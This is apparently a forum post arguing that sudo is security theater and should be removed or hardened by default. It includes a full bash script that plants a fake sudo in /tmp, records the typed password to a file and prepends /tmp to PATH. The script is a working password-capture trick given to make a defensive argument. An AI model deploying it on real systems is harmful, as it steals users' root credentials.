I think we should setup Safely Use Root Commands by default or go further and remove sudo entirely.
I see what “iamwho” meant now.
It is trivial to grab the password and gain full root access.
For example, the attacker can exploit the plethora of keylogging opportunities such as X’s lack of GUI isolation, the many infoleaks in /proc and so much more.
Even if we mitigate every single way to log keystrokes, the attacker can just setup their own fake sudo program:
cat <<\EOF > /tmp/sudo
#!/bin/bash
if [[ "${@}" = "" ]]; then
/usr/bin/sudo
else
read -r -p "[sudo] password for user: " password
echo "${password}" > /tmp/password
echo "Sorry, try again."
/usr/bin/sudo ${@}
fi
EOF
chmod +x /tmp/sudo
export PATH="/tmp:${PATH}"
Using sudo is essentially security theater.
Edit: the LD_PRELOAD method won’t work on setuid binaries like sudo.